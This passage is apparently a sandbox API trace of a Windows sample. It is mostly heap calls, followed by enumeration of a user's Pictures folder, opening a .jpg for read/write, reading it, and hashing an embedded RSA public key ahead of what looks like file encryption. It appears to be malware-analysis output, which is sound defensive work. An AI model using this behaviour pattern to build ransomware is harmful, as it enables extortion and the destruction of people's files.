0x2e765d0 [0201.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.350] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\") returned="iIfMhH\\" [0201.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0201.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.350] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\") returned="KiR-tAs9lgdEh FXubwY\\" [0201.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0201.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fd20 [0201.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0201.351] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0201.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fd20 | out: hHeap=0x620000) returned 1 [0201.351] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0201.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.351] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.352] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.352] PathFindFileNameW (pszPath="") returned="" [0201.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.352] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2465a110, ftCreationTime.dwHighDateTime=0x1d89852, ftLastAccessTime.dwLowDateTime=0x744db970, ftLastAccessTime.dwHighDateTime=0x1d8a26f, ftLastWriteTime.dwLowDateTime=0x744db970, ftLastWriteTime.dwHighDateTime=0x1d8a26f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0201.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.367] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2465a110, ftCreationTime.dwHighDateTime=0x1d89852, ftLastAccessTime.dwLowDateTime=0x744db970, ftLastAccessTime.dwHighDateTime=0x1d8a26f, ftLastWriteTime.dwLowDateTime=0x744db970, ftLastWriteTime.dwHighDateTime=0x1d8a26f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.368] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc90aeff0, ftCreationTime.dwHighDateTime=0x1d8a15c, ftLastAccessTime.dwLowDateTime=0x942f3620, ftLastAccessTime.dwHighDateTime=0x1d8a548, ftLastWriteTime.dwLowDateTime=0x942f3620, ftLastWriteTime.dwHighDateTime=0x1d8a548, nFileSizeHigh=0x0, nFileSizeLow=0x11a97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5DS0X1cGBS4n2igZsE.jpg", cAlternateFileName="5DS0X1~1.JPG")) returned 1 [0201.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0201.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.368] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\5DS0X1cGBS4n2igZsE.jpg") returned=".jpg" [0201.368] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\5DS0X1cGBS4n2igZsE.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\5ds0x1cgbs4n2igzse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.370] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=72343) returned 1 [0201.370] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.373] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x11a71, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.373] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.375] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.375] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x11a97, lpOverlapped=0x0) returned 1 [0201.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.376] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c278) returned 1 [0201.378] CryptCreateHash (in: hProv=0x67c278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.378] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.378] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.378] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.379] GetLastError () returned 0x0 [0201.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.379] GetLastError () returned 0x0 [0201.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.379] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.379] CryptReleaseContext (hProv=0x67c278, dwFlags=0x0) returned 1 [0201.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.380] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.380] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.380] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11aa0) returned 0x2ea99b0 [0201.381] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fd20 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fd68 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.382] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3470 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3458 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.386] GetCurrentThreadId () returned 0x66c [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8748 [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.387] GetCurrentThreadId () returned 0x66c [0201.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 